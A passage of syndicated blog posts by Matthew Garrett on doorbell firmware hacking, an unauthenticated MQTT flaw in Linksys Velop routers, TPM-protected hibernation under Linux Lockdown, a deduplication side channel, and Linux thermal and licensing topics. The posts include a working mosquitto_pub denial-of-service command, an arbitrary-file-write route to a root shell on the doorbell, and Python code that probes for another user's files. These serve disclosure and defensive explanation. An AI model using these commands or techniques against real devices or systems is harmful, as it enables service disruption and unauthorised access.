The doorbell runs various bits of software, one of which is Lighttpd to provide a local API and access to the device. Another component (“nxp-client”) connects to the vendor’s cloud infrastructure and passes cloud commands back to the local webserver. This is where I found something strange. Lighttpd was refusing to start because its modules wanted library symbols that simply weren’t present on the device. My best guess is that a firmware update went wrong and left the device in a partially upgraded state – and without a working local webserver, there was no way to perform any further updates. This may explain why this doorbell was sitting on ebay.

Anyway. Now that I had shell, I could simply dump the flash by copying it directly off the /dev/mtdblock devices – since I had netcat, I could just pipe stuff through that back to my actual computer. Now I had access to the filesystem I could extract that locally and start digging into it more deeply. One incredibly useful tool for this is qemu-user. qemu is a general purpose hardware emulation platform, usually used to emulate entire systems. But in qemu-user mode, it instead only emulates the CPU. When a piece of code tries to make a system call to access the kernel, qemu-user translates that to the appropriate calling convention for the host kernel and makes that call instead. Combined with binfmt_misc, you can configure a Linux system to be able to run Linux binaries from other architectures. One of the best things about this is that, because they’re still using the host convention for making syscalls, you can run the host strace on them and see what they’re doing.

What I found was that nxp-client was calling back to the cloud platform, setting up an encrypted communication channel (using ChaCha20 and a bunch of key setup stuff I couldn’t be bothered picking apart) and then waiting for commands from the cloud. It would then proxy those through to the local webserver. Since I couldn’t run the local lighttpd, I just wrote a trivial Python app using http.server and waited to see what requests I got. The first was a GET to a CGI script called editcgi.cgi, along with a path name. I mocked up the GET request to respond with what was on the actual filesystem. The cloud then proceeded to POST to editcgi.cgi, with the same pathname and with new file contents. editcgi.cgi is apparently able to read and write to files on the filesystem.
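
That trivial app looked something like this – the query parameter name used for the path is a placeholder, since the real one is whatever turned up in the requests:

# Sketch of a mock webserver standing in for lighttpd: log everything, serve
# file contents for GETs to editcgi.cgi and dump whatever gets POSTed back.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        url = urlparse(self.path)
        print("GET", self.path)
        # "file" is a placeholder for whatever parameter the real requests used
        target = parse_qs(url.query).get("file", [None])[0]
        if url.path.endswith("/editcgi.cgi") and target:
            with open(target, "rb") as f:
                body = f.read()
            self.send_response(200)
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(404)
            self.end_headers()

    def do_POST(self):
        # Log whatever gets pushed back at us so we can see the write path
        length = int(self.headers.get("Content-Length", 0))
        print("POST", self.path, self.rfile.read(length)[:200])
        self.send_response(200)
        self.end_headers()

HTTPServer(("", 80), Handler).serve_forever()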

But this is on the interface that’s exposed to the cloud client, so this didn’t appear immediately useful – and, indeed, trying to hit the same CGI binary over the local network gave me a 401 unauthorized error. There’s a local API spec for these doorbells, but they all refer to scripts in the bha-api namespace, and this script was in the plain cgi-bin namespace. But then I noticed that the bha-api namespace didn’t actually exist in the filesystem – instead, lighttpd’s mod_alias was configured to rewrite requests to bha-api through to files in cgi-bin. And by using the documented API to get a session token, I could call editcgi.cgi to read and write arbitrary files on the doorbell. Which means I can drop an extra script in /etc/rc.d/rc3.d and get a shell on my doorbell.

This all requires the ability to have local authentication credentials, so it’s not a big security deal other than it allowing you to retain access to a monitoring device even after you’ve moved out and had your credentials revoked. I’m sure it’s all fine.

[1] I can ping the doorbell from the Home Assistant machine, so it’s not that the network is flaky
[2] The password appears to be [email protected] if anyone else ends up in this situation
[3] https://twitter.com/mjg59/status/654578208545751040


Unauthenticated MQTT endpoints on Linksys Velop routers enable local DoS

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/56106.html

(Edit: this is CVE-2021-1000002)

Linksys produces a series of wifi mesh routers under the Velop line. These routers use MQTT to send messages to each other for coordination purposes. In the version I tested against, there was zero authentication on this – anyone on the local network is able to connect to the MQTT interface on a router and send commands. As an example:
mosquitto_pub -h 192.168.1.1 -t "network/master/cmd/nodes_temporary_blacklist" -m '{"data": {"client": "f8:16:54:43:e2:0c", "duration": "3600", "action": "start"}}'
will ask the router to block the client with MAC address f8:16:54:43:e2:0c from the network for an hour. Various other MQTT topics pass parameters to shell scripts without quoting them or escaping metacharacters, so more serious outcomes may be possible.

The vendor has released two firmware updates since my report – I have not verified whether either fixes this, but the changelog does not indicate any security issues were addressed.

Timeline:

2020-07-30: Submitted through the vendor’s security vulnerability report form, indicating that I plan to disclose in either 90 days or after a fix is released. The form turns out to file a Bugcrowd submission.
2020-07-30: I claim the Bugcrowd submission.
2020-08-19: Vendor acknowledges the issue, is able to reproduce and assigns it a P3 priority.
2020-12-15: I ask if there’s an update.
2021-02-02: I ask if there’s an update.
2021-02-03: Bugcrowd raise a blocker on the issue, asking the vendor to respond.
2021-02-17: I ask for permission to disclose.
2021-03-09: In the absence of any response from the vendor since 2020-08-19, I violate Bugcrowd disclosure policies and unilaterally disclose.


Making hibernation work under Linux Lockdown

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55845.html

Linux draws a distinction between code running in kernel (kernel space) and applications running in userland (user space). This is enforced at the hardware level – in x86-speak[1], kernel space code runs in ring 0 and user space code runs in ring 3[2]. If you’re running in ring 3 and you attempt to touch memory that’s only accessible in ring 0, the hardware will raise a fault. No matter how privileged your ring 3 code, you don’t get to touch ring 0.

Kind of. In theory. Traditionally this wasn’t well enforced. At the most basic level, since root can load kernel modules, you could just build a kernel module that performed any kernel modifications you wanted and then have root load it. Technically user space code wasn’t modifying kernel space code, but the difference was pretty semantic rather than useful. But it got worse – root could also map memory ranges belonging to PCI devices[3], and if the device could perform DMA you could just ask the device to overwrite bits of the kernel[4]. Or root could modify special CPU registers (“Model Specific Registers”, or MSRs) that alter CPU behaviour via the /dev/msr interface, and compromise the kernel boundary that way.

It turns out that there were a number of ways root was effectively equivalent to ring 0, and the boundary was more about reliability (ie, a process running as root that ends up misbehaving should still only be able to crash itself rather than taking down the kernel with it) than security. After all, if you were root you could just replace the on-disk kernel with a backdoored one and reboot. Going deeper, you could replace the bootloader with one that automatically injected backdoors into a legitimate kernel image. We didn’t have any way to prevent this sort of thing, so attempting to harden the root/kernel boundary wasn’t especially interesting.

In 2012 Microsoft started requiring vendors ship systems with UEFI Secure Boot, a firmware feature that allowed[5] systems to refuse to boot anything without an appropriate signature. This not only enabled the creation of a system that drew a strong boundary between root and kernel, it arguably required one – what’s the point of restricting what the firmware will stick in ring 0 if root can just throw more code in there afterwards? What ended up as the Lockdown Linux Security Module provides the tooling for this, blocking userspace interfaces that can be used to modify the kernel and enforcing that any modules have a trusted signature.

But that comes at something of a cost. Most of the features that Lockdown blocks are fairly niche, so the direct impact of having it enabled is small. Except that it also blocks hibernation[6], and it turns out some people were using that. The obvious question is “what does hibernation have to do with keeping root out of kernel space”, and the answer is a little convoluted and is tied into how Linux implements hibernation. Basically, Linux saves system state into the swap partition and modifies the header to indicate that there’s a hibernation image there instead of swap. On the next boot, the kernel sees the header indicating that it’s a hibernation image, copies the contents of the swap partition back into RAM, and then jumps back into the old kernel code. What ensures that the hibernation image was actually written out by the kernel? Absolutely nothing, which means a motivated attacker with root access could turn off swap, write a hibernation image to the swap partition themselves, and then reboot. The kernel would happily resume into the attacker’s image, giving the attacker control over what gets copied back into kernel space.

This is annoying, because normally when we think about attacks on swap we mitigate them by requiring an encrypted swap partition. But in this case, our attacker is root, and so already has access to the plaintext version of the swap partition. Disk encryption doesn’t save us here. We need some way to verify that the hibernation image was written out by the kernel, not by root. And thankfully we have some tools for that.

Trusted Platform Modules (TPMs) are cryptographic coprocessors[7] capable of doing things like generating encryption keys and then encrypting things with them. You can ask a TPM to encrypt something with a key that’s tied to that specific TPM – the OS has no access to the decryption key, and nor does any other TPM. So we can have the kernel generate an encryption key, encrypt part of the hibernation image with it, and then have the TPM encrypt it. We store the encrypted copy of the key in the hibernation image as well. On resume, the kernel reads the encrypted copy of the key, passes it to the TPM, gets the decrypted copy back and is able to verify the hibernation image.

That’s great! Except root can do exactly the same thing. This tells us the hibernation image was generated on this machine, but doesn’t tell us that it was done by the kernel. We need some way to be able to differentiate between keys that were generated in kernel and ones that were generated in userland. TPMs have the concept of “localities” (effectively privilege levels) that would be perfect for this. Userland is only able to access locality 0, so the kernel could simply use locality 1 to encrypt the key. Unfortunately, despite trying pretty hard, I’ve been unable to get localities to work. The motherboard chipset on my test machines simply doesn’t forward any accesses to the TPM unless they’re for locality 0. I needed another approach.

TPMs have a set of Platform Configuration Registers (PCRs), intended for keeping a record of system state. The OS isn’t able to modify the PCRs directly. Instead, the OS provides a cryptographic hash of some material to the TPM. The TPM takes the existing PCR value, appends the new hash to that, and then stores the hash of the combination in the PCR – a process called “extension”. This means that the new value of the PCR depends not only on the value of the new data, it depends on the previous value of the PCR – and, in turn, that previous value depended on its previous value, and so on. The only way to get to a specific PCR value is to either (a) break the hash algorithm, or (b) perform exactly the same sequence of writes. On system reset the PCRs go back to a known value, and the entire process starts again.

Some PCRs are different. PCR 23, for example, can be reset back to its original value without resetting the system. We can make use of that. The first thing we need to do is to prevent userland from being able to reset or extend PCR 23 itself. All TPM accesses go through the kernel, so this is a simple matter of parsing the write before it’s sent to the TPM and returning an error if it’s a sensitive command that would touch PCR 23. We now know that any change in PCR 23’s state will be restricted to the kernel.

When we encrypt material with the TPM, we can ask it to record the PCR state. This is given back to us as metadata accompanying the encrypted secret. Along with the metadata is an additional signature created by the TPM, which can be used to prove that the metadata is both legitimate and associated with this specific encrypted data. In our case, that means we know what the value of PCR 23 was when we encrypted the key. That means that if we simply extend PCR 23 with a known value in-kernel before encrypting our key, we can look at the value of PCR 23 in the metadata. If it matches, the key was encrypted by the kernel – userland can create its own key, but it has no way to extend PCR 23 to the appropriate value first. We now know that the key was generated by the kernel.
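
In hash terms the check is tiny. Something like this, where the PCR 23 value comes from the TPM’s signed creation data and the constant is made up for illustration:

# The kernel extends PCR 23 with a fixed, kernel-only value before encrypting the
# key. Userland can't reproduce that state, so a matching creation-data PCR value
# implies the key was created in-kernel. The constant below is made up.
import hashlib

KERNEL_ONLY_VALUE = hashlib.sha256(b"linux-hibernation-key").digest()  # hypothetical

def expected_pcr23():
    reset_value = bytes(32)  # PCR 23 resets to all zeroes
    return hashlib.sha256(reset_value + KERNEL_ONLY_VALUE).digest()

def key_created_by_kernel(creation_pcr23):
    return creation_pcr23 == expected_pcr23()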

But what if the attacker is able to gain access to the encrypted key? Let’s say a kernel bug is hit that prevents hibernation from resuming, and you boot back up without wiping the hibernation image. Root can then read the key from the partition, ask the TPM to decrypt it, and then use that to create a new hibernation image. We probably want to prevent that as well. Fortunately, when you ask the TPM to encrypt something, you can ask that the TPM only decrypt it if the PCRs have specific values. “Sealing” material to the TPM in this way allows you to block decryption if the system isn’t in the desired state. So, we define a policy that says that PCR 23 must have the same value at resume as it did on hibernation. On resume, the kernel resets PCR 23, extends it to the same value it did during hibernation, and then attempts to decrypt the key. Afterwards, it resets PCR 23 back to the initial value. Even if an attacker gains access to the encrypted copy of the key, the TPM will refuse to decrypt it.

And that’s what this patchset implements. There’s one fairly significant flaw at the moment, which is simply that an attacker can just reboot into an older kernel that doesn’t implement the PCR 23 blocking and set up state by hand. Fortunately, this can be avoided using another aspect of the boot process. When you boot something via UEFI Secure Boot, the signing key used to verify the booted code is measured into PCR 7 by the system firmware. In the Linux world, the Shim bootloader then measures any additional keys that are used. By either using a new key to tag kernels that have support for the PCR 23 restrictions, or by embedding some additional metadata in the kernel that indicates the presence of this feature and measuring that, we can have a PCR 7 value that verifies that the PCR 23 restrictions are present. We then seal the key to PCR 7 as well as PCR 23, and if an attacker boots into a kernel that doesn’t have this feature the PCR 7 value will be different and the TPM will refuse to decrypt the secret.

While there’s a whole bunch of complexity here, the process should be entirely transparent to the user. The current implementation requires a TPM 2, and I’m not certain whether TPM 1.2 provides all the features necessary to do this properly – if so, extending it shouldn’t be hard, but also all systems shipped in the past few years should have a TPM 2, so that’s going to depend on whether there’s sufficient interest to justify the work. And we’re also at the early days of review, so there’s always the risk that I’ve missed something obvious and there are terrible holes in this. And, well, given that it took almost 8 years to get the Lockdown patchset into mainline, let’s not assume that I’m good at landing security code.

[1] Other architectures use different terminology here, such as “supervisor” and “user” mode, but it’s broadly equivalent
[2] In theory rings 1 and 2 would allow you to run drivers with privileges somewhere between full kernel access and userland applications, but in reality we just don’t talk about them in polite company
[3] This is how graphics worked in Linux before kernel modesetting turned up. XFree86 would just map your GPU’s registers into userland and poke them directly. This was not a huge win for stability
[4] IOMMUs can help you here, by restricting the memory PCI devices can DMA to or from. The kernel then gets to allocate ranges for device buffers and configure the IOMMU such that the device can’t DMA to anything else. Except that region of memory may still contain sensitive material such as function pointers, and attacks like this can still cause you problems as a result.
[5] This describes why I’m using “allowed” rather than “required” here
[6] Saving the system state to disk and powering down the platform entirely – significantly slower than suspending the system while keeping state in RAM, but also resilient against the system losing power.
[7] With some handwaving around “coprocessor”. TPMs can’t be part of the OS or the system firmware, but they don’t technically need to be an independent component. Intel have a TPM implementation that runs on the Management Engine, a separate processor built into the motherboard chipset. AMD have one that runs on the Platform Security Processor, a small ARM core built into their CPU. Various ARM implementations run a TPM in Trustzone, a special CPU mode that (in theory) is able to access resources that are entirely blocked off from anything running in the OS, kernel or otherwise.


Filesystem deduplication is a sidechannel

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55638.html

First off – nothing I’m going to talk about in this post is novel or overly surprising, I just haven’t found a clear writeup of it before. I’m not criticising any design decisions or claiming this is an important issue, just raising something that people might otherwise be unaware of.

With that out of the way: Automatic deduplication of data is a feature of modern filesystems like zfs and btrfs. It takes two forms – inline, where the filesystem detects that data being written to disk is identical to data that already exists on disk and simply references the existing copy rather than storing it again, and offline, where tooling retroactively identifies duplicated data and removes the duplicate copies (zfs supports inline deduplication, btrfs only currently supports offline). In a world where disks end up with multiple copies of cloud or container images, deduplication can free up significant amounts of disk space.

What’s the security implication? The problem is that deduplication doesn’t recognise ownership – if two users have copies of the same file, only one copy of the file will be stored[1]. So, if user a stores a file, the amount of free space will decrease. If user b stores another copy of the same file, the amount of free space will remain the same. If user b is able to check how much free space is available, user b can determine whether the file already exists.
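
The probe itself needs nothing more than the ability to write a file and look at the free space figures. A minimal sketch (assuming Python, a scratch directory on the deduplicating filesystem and inline deduplication – in practice metadata overhead and delayed allocation mean you’d want a larger file and some slack in the comparison):

    import os, shutil

    def free_bytes(path):
        # f_bavail * f_frsize is the space available to an unprivileged user
        st = os.statvfs(path)
        return st.f_bavail * st.f_frsize

    def probably_already_present(candidate, scratch_dir):
        # Write a copy of the candidate file and see how much free space drops.
        # If an identical copy already exists and gets deduplicated inline,
        # the drop will be far smaller than the file size.
        before = free_bytes(scratch_dir)
        probe = os.path.join(scratch_dir, "probe.bin")
        shutil.copyfile(candidate, probe)
        os.sync()
        after = free_bytes(scratch_dir)
        os.remove(probe)
        return (before - after) < os.path.getsize(candidate) // 2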

This doesn’t seem like a huge deal in most cases, but it is a violation of expected behaviour (if user b doesn’t have permission to read user a’s files, user b shouldn’t be able to determine whether user a has a specific file). But we can come up with some convoluted cases where it becomes more relevant, such as law enforcement gaining unprivileged access to a system and then being able to demonstrate that a specific file already exists on that system. Perhaps more interestingly, it’s been demonstrated that free space isn’t the only sidechannel exposed by deduplication – deduplication has an impact on access timing, and can be used to infer the existence of data across virtual machine boundaries.

As I said, this is almost certainly not something that matters in most real world scenarios. But with so much discussion of CPU sidechannels over the past couple of years, it’s interesting to think about what other features also end up leaking information in ways that may not be obvious.

[1] Deduplication is usually done at the block level rather than the file level, but given zfs’s support for variable sized blocks, identical files should be deduplicated even if they’re smaller than the maximum record size

Making my doorbell work

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55312.html

I recently moved house, and the new building has a Doorbird to act as a doorbell and open the entrance gate for people. There’s a documented local control API (no cloud dependency!) and a Home Assistant integration, so this seemed pretty straightforward.

Unfortunately not. The Doorbird is on a separate network that’s shared across the building, provided by Monkeybrains. We’re also a Monkeybrains customer, so our network connection is plugged into the same router and antenna as the Doorbird’s. And, as is common, there’s port isolation between the networks in order to avoid leakage of information between customers. Rather perversely, that means we’re the only people with an internet connection who are unable to ping my doorbell.

I spent most of the past few weeks digging myself out from under a pile of boxes, but we’d finally reached the point where spending some time figuring out a solution to this seemed reasonable. I spent a while playing with port forwarding, but that wasn’t ideal – the only server I run is in the UK, and having packets round trip almost 11,000 miles so I could speak to something a few metres away seemed like a bad plan. Then I tried tethering an old Android device with a data-only SIM, which worked fine but only in one direction (I could see what the doorbell could see, but I couldn’t get notifications that someone had pushed a button, which was kind of the point here).

So I went with the obvious solution – I added a wifi access point to the doorbell network, so my home automation machine now exists on two networks simultaneously (nmcli device modify wlan0 ipv4.never-default true is the magic for “ignore the gateway that the DHCP server gives you”, which stops the machine trying to route its internet traffic via the doorbell network). That also meant I could do link local service discovery to find the doorbell if it changed address after a power cut or anything. And then, like magic, everything worked – I got notifications from the doorbell when someone hit our button.

But knowing that an event occurred without actually doing something in response seems fairly unhelpful. I have a bunch of Chromecast targets around the house (a mixture of Google Home devices and Chromecast Audios), so just pushing a message to them seemed like the easiest approach. Home Assistant has a text to speech integration that can call out to various services to turn some text into a sample, and then push that to a media player on the local network. You can group multiple Chromecast audio sinks into a group that then presents as a separate device on the network, so I could then write an automation to push audio to the speaker group in response to the button being pressed.
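
If you’d rather trigger the announcement from outside Home Assistant, the same thing can be pushed through the REST API – something like the following, where the host, token, entity ID and even the TTS service name are placeholders that depend on how your instance is set up:

    import requests

    HASS = "http://homeassistant.local:8123"    # placeholder hostname
    TOKEN = "replace-with-a-long-lived-access-token"
    HEADERS = {"Authorization": f"Bearer {TOKEN}"}

    def announce(message):
        # Ask the TTS integration to speak on the Chromecast speaker group.
        # The service name depends on which TTS backend is configured.
        requests.post(f"{HASS}/api/services/tts/google_translate_say",
                      headers=HEADERS,
                      json={"entity_id": "media_player.all_speakers",
                            "message": message})

    announce("Someone is at the door")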

That’s nice, but it’d be even nicer to do something in response. The Doorbird exposes API control of the gate latch, and Home Assistant exposes that as a switch. I’m using Home Assistant’s Google Assistant integration to expose devices Home Assistant knows about to voice control. Which means when I get a house-wide notification that someone’s at the door I can just ask Google to open the door for them.

So. Someone pushes the doorbell. That sends a signal to a machine that’s bridged onto that network via an access point. That machine then sends a protobuf command to speakers on a separate network, asking them to stream a sample it’s providing. Those speakers call back to that machine, grab the sample and play it. At this point, multiple speakers in the house say “Someone is at the door”. I then say “Hey Google, activate the front gate” – the device I’m closest to picks this up and sends it to Google, where something turns my speech back into text. It then looks at my home structure data and realises that the “Front Gate” device is associated with my Home Assistant integration. It then calls out to the home automation machine that received the notification in the first place, asking it to trigger the front gate relay. That device calls out to the Doorbird and asks it to open the gate. And now I have functionality equivalent to a doorbell that completes a circuit and rings a bell inside my home, and a button inside my home that completes a circuit and opens the gate, except it involves two networks inside my building, callouts to the cloud, at least 7 devices inside my home that are running Linux and I really don’t want to know how many computational cycles.

The future is wonderful.

(I work for Google. I do not work on any of the products described in this post. Please god do not ask me how to integrate your IoT into any of this)

Linux kernel lockdown, integrity, and confidentiality

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/55105.html

The Linux kernel lockdown patches were merged into the 5.4 kernel last year, which means they’re now part of multiple distributions. For me this was a 7-year journey, which means it’s easy to forget that others aren’t as invested in the code as I am. Here’s what these patches are intended to achieve, why they’re implemented in the current form and what people should take into account when deploying the feature.

Root is a user – a privileged user, but nevertheless a user. Root is not identical to the kernel. Processes running as root still can’t dereference addresses that belong to the kernel, are still subject to the whims of the scheduler and so on. But historically that boundary has been very porous. Various interfaces make it straightforward for root to modify kernel code (such as loading modules or using /dev/mem), while others make it less straightforward (being able to load new ACPI tables that can cause the ACPI interpreter to overwrite the kernel, for instance). In the past that wasn’t seen as a significant issue, since there were no widely deployed mechanisms for verifying the integrity of the kernel in the first place. But once UEFI secure boot became widely deployed, this was a problem. If you verify your boot chain but allow root to modify that kernel, the benefits of the verified boot chain are significantly reduced. Even if root can’t modify the on-disk kernel, root can just hot-patch the kernel and then make this persistent by dropping a binary that repeats the process on system boot.

Lockdown is intended as a mechanism to avoid that, by providing an optional policy that closes off interfaces that allow root to modify the kernel. This was the sole purpose of the original implementation, which maps to the “integrity” mode that’s present in the current implementation. Kernels that boot in lockdown integrity mode prevent even root from using these interfaces, increasing assurances that the running kernel corresponds to the booted kernel. But lockdown’s functionality has been extended since then. There are some use cases where preventing root from being able to modify the kernel isn’t enough – the kernel may hold secret information that even root shouldn’t be permitted to see (such as the EVM signing key that can be used to prevent offline file modification), and the integrity mode doesn’t prevent that. This is where lockdown’s confidentiality mode comes in. Confidentiality mode is a superset of integrity mode, with additional restrictions on root’s ability to use features that would allow the inspection of any kernel memory that could contain secrets.
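
If you’re not sure which mode (if any) a kernel you’re running was booted with, the lockdown LSM reports its state through securityfs – a quick check looks something like this, assuming securityfs is mounted in the usual place:

    def lockdown_mode(path="/sys/kernel/security/lockdown"):
        # The file lists the supported modes with the active one in brackets,
        # e.g. "none [integrity] confidentiality"
        try:
            modes = open(path).read().split()
        except FileNotFoundError:
            return None    # kernel without lockdown, or securityfs not mounted
        for mode in modes:
            if mode.startswith("["):
                return mode.strip("[]")
        return None

    print(lockdown_mode())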

Unfortunately right now we don’t have strong mechanisms for marking which bits of kernel memory contain secrets, so in order to achieve that we end up blocking access to all kernel memory. Unsurprisingly, this compromises people’s ability to inspect the kernel for entirely legitimate reasons, such as using the various mechanisms that allow tracing and probing of the kernel.

How can we solve this? There’s a few ways:

  1. Introduce a mechanism to tag memory containing secrets, and only restrict accesses to this. I’ve tried to do something similar for userland and it turns out to be hard, but this is probably the best long-term solution.
  2. Add support for privileged applications with an appropriate signature that implement policy on the userland side. This is actually possible already, though not straightforward. Lockdown is implemented in the LSM layer, which means the policy can be imposed using any other existing LSM. As an example, we could use SELinux to impose the confidentiality restrictions on most processes but permit processes with a specific SELinux context to use them, and then use EVM to ensure that any process running in that context has a legitimate signature. This is quite a few hoops for a general purpose distribution to jump through.
  3. Don’t use confidentiality mode in general purpose distributions. The attacks it protects against are mostly against special-purpose use cases, and they can enable it themselves.

My recommendation is for (3), and I’d encourage general purpose distributions that enable lockdown to do so only in integrity mode rather than confidentiality mode. The cost of confidentiality mode is just too high compared to the benefits it provides. People who need confidentiality mode probably already know that they do, and should be in a position to enable it themselves and handle the consequences.

Implementing support for advanced DPTF policy in Linux

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54923.html

Intel’s Dynamic Platform and Thermal Framework (DPTF) is a feature that’s becoming increasingly common on highly portable Intel-based devices. The adaptive policy it implements is based around the idea that thermal management of a system is becoming increasingly complicated – the appropriate set of cooling constraints to place on a system may differ based on a whole bunch of criteria (eg, if a tablet is being held vertically rather than lying on a table, it’s probably going to be able to dissipate heat more effectively, so you should impose different constraints). One way of providing these criteria to the OS is to embed them in the system firmware, allowing an OS-level agent to read that and then incorporate OS-level knowledge into a final policy decision.

Unfortunately, while Intel have released some amount of support for DPTF on Linux, they haven’t included support for the adaptive policy. And even more annoyingly, many modern laptops run in a heavily conservative thermal state if the OS doesn’t support the adaptive policy, meaning that the CPU throttles down extremely quickly and the laptop runs excessively slowly.

It’s been a while since I really got stuck into a laptop reverse engineering project, and I don’t have much else to do right now, so I’ve been working on this. It’s been a combination of examining what source Intel have released, reverse engineering the Windows code and staring hard at hex dumps until they made some sort of sense. Here’s where I am.

There’s two main components to the adaptive policy – the adaptive conditions table (APCT) and the adaptive actions table (APAT). The adaptive conditions table contains a set of condition sets, with up to 10 conditions in each condition set. A condition is something like “is the battery above a certain charge”, “is this temperature sensor below a certain value”, “is the lid open or closed”, “is the machine upright or horizontal” and so on. Each condition set is evaluated in turn – if all the conditions evaluate to true, the condition set’s target is implemented. If not, we move onto the next condition set. There will typically be a fallback condition set to catch the case where none of the other condition sets evaluate to true.

The action table contains sets of actions associated with a specific target. Once we’ve picked a target by evaluating the conditions, we execute the actions that have a corresponding target. Actions are things like “Set the CPU power limit to this value” or “Load a passive policy table”. Passive policy tables are simply tables associating sensors with devices and an associated temperature limit. If the limit is exceeded, the associated device should be asked to reduce its heat output until the situation is resolved.
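
To make that structure a little more concrete, the evaluation logic boils down to something like the following sketch – the field names are invented and the real tables are binary blobs rather than anything this tidy:

    def pick_target(condition_sets, evaluate):
        # Walk the APCT in order; the first condition set whose conditions all
        # evaluate to true wins. A fallback set with no conditions catches
        # everything else.
        for cset in condition_sets:
            if all(evaluate(cond) for cond in cset["conditions"]):
                return cset["target"]
        return None

    def run_actions(action_table, target):
        # Execute every action in the APAT associated with the chosen target,
        # e.g. setting a CPU power limit or loading a passive policy table.
        for action in action_table:
            if action["target"] == target:
                apply_action(action)

    def apply_action(action):
        # Placeholder: the real agent pokes the relevant sysfs or ACPI interface
        print("would apply", action)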

There’s a couple of twists. The first is the OEM conditions. These are conditions that refer to values that are exposed by the firmware and are otherwise entirely opaque – the firmware knows what these mean, but we don’t, so conditions that rely on these values are magical. They could be temperature, they could be power consumption, they could be SKU variations. We just don’t know. The other is that older versions of the APCT table didn’t include a reference to a device – ie, if you specified a condition based on a temperature, you had no way to express which temperature sensor to use. So, instead, you specified a condition that’s greater than 0x10000, which tells the agent to look at the APPC table to extract the device and the appropriate actual condition.

Intel already have a Linux app called Thermal Daemon that implements a subset of this – you’re supposed to run the binary-only dptfxtract against your firmware to parse a few bits of the DPTF tables, and it writes out an XML file that Thermal Daemon makes use of. Unfortunately it doesn’t handle most of the more interesting bits of the adaptive performance policy, so I’ve spent the past couple of days extending it to do so and to remove the proprietary dependency.

My current work is here – it requires a couple of kernel patches (that are in the patches directory), and it only supports a very small subset of the possible conditions. It’s also entirely possible that it’ll do something inappropriate and cause your computer to melt – none of this is publicly documented, I don’t have access to the spec and you’re relying on my best guesses in a lot of places. But it seems to behave roughly as expected on the one test machine I have here, so time to get some wider testing?

What usage restrictions can we place in a free software license?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54709.html

Growing awareness of the wider social and political impact of software development has led to efforts to write licenses that prevent software being used to engage in acts that are seen as socially harmful, with the Hippocratic License being perhaps the most discussed example (although the JSON license‘s requirement that the software be used for good, not evil, is arguably an earlier version of the theme). The problem with these licenses is that they’re pretty much universally considered to fall outside the definition of free software or open source licenses due to their restrictions on use, and there’s a whole bunch of people who have very strong feelings that this is a very important thing. There’s also the more fundamental underlying point that it’s hard to write a license like this where everyone agrees on whether a specific thing is bad or not (eg, while many people working on a project may feel that it’s reasonable to prohibit the software being used to support drone strikes, others may feel that the project shouldn’t have a position on the use of the software to support drone strikes and some may even feel that some people should be the victims of drone strikes). This is, it turns out, all quite complicated.

But there is something that many (but not all) people in the free software community agree on – certain restrictions are legitimate if they ultimately provide more freedom. Traditionally this was limited to restrictions on distribution (eg, the GPL requires that your recipient be able to obtain corresponding source code, and for GPLv3 must also be able to obtain the necessary signing keys to be able to replace it in covered devices), but more recently there’s been some restrictions that don’t require distribution. The best known is probably the clause in the Affero GPL (or AGPL) that requires that users interacting with covered code over a network be able to download the source code, but the Cryptographic Autonomy License (recently approved as an Open Source license) goes further and requires that users be able to obtain their data in order to self-host an equivalent instance.

We can construct examples of where these prevent certain fields of endeavour, but the tradeoff has been deemed worth it – the benefits to user freedom that these licenses provide is greater than the corresponding cost to what you can do. How far can that tradeoff be pushed? So, here’s a thought experiment. What if we write a license that’s something like the following:

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. All permissions granted by this license must be passed on to all recipients of modified or unmodified versions of this work
2. This work may not be used in any way that impairs any individual's ability to exercise the permissions granted by this license, whether or not they have received a copy of the covered work

This feels like the logical extreme of the argument. Any way you could use the covered work that would restrict someone else’s ability to do the same is prohibited. This means that, for example, you couldn’t use the software to implement a DRM mechanism that the user couldn’t replace (along the lines of GPLv3’s anti-Tivoisation clause), but it would also mean that you couldn’t use the software to kill someone with a drone (doing so would impair their ability to make use of the software). The net effect is along the lines of the Hippocratic license, but it’s framed in a way that is focused on user freedom.

To be clear, I don’t think this is a good license – it has a bunch of unfortunate consequences like it being impossible to use covered code in self-defence if doing so would impair your attacker’s ability to use the software. I’m not advocating this as a solution to anything. But I am interested in seeing whether the perception of the argument changes when we refocus it on user freedom as opposed to an independent ethical goal.

Thoughts?

Edit:

Rich Felker on Twitter had an interesting thought – if clause 2 above is replaced with:

2. Your rights under this license terminate if you impair any individual's ability to exercise the permissions granted by this license, even if the covered work is not used to do so

how does that change things? My gut feeling is that covering actions that are unrelated to the use of the software might be a reach too far, but it gets away from the idea that it’s your use of the software that triggers the clause.

Avoiding gaps in IOMMU protection at boot

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/54433.html

When you save a large file to disk or upload a large texture to your graphics card, you probably don’t want your CPU to sit there spending an extended period of time copying data between system memory and the relevant peripheral – it could be doing something more useful instead. As a result, most hardware that deals with large quantities of data is capable of Direct Memory Access (or DMA). DMA-capable devices are able to access system memory directly without the aid of the CPU – the CPU simply tells the device which region of memory to copy and then leaves it to get on with things. However, we also need to get data back to system memory, so DMA is bidirectional. This means that DMA-capable devices are able to read and write directly to system memory.

As long as devices are entirely under the control of the OS, this seems fine. However, this isn’t always true – there may be bugs, the device may be passed through to a guest VM (and so no longer under the control of the host OS) or the device may be running firmware that makes it actively malicious. The third is an important point here – while we usually think of DMA as something that has to be set up by the OS, at a technical level the transactions are initiated by the device. A device that’s running hostile firmware is entirely capable of choosing what and where to DMA.

Most reasonably recent hardware includes an IOMMU to handle this. The CPU’s MMU exists to define which regions of memory a process can read or write – the IOMMU does the same but for external IO devices. An operating system that knows how to use the IOMMU can allocate specific regions of memory that a device can DMA to or from, and any attempt to access memory outside those regions will fail. This was originally intended to handle passing devices through to guests (the host can protect itself by restricting any DMA to memory belonging to the guest – if the guest tries to read or write to memory belonging to the host, the attempt will fail), but is just as relevant to preventing malicious devices from extracting secrets from your OS or even modifying the runtime state of the OS.

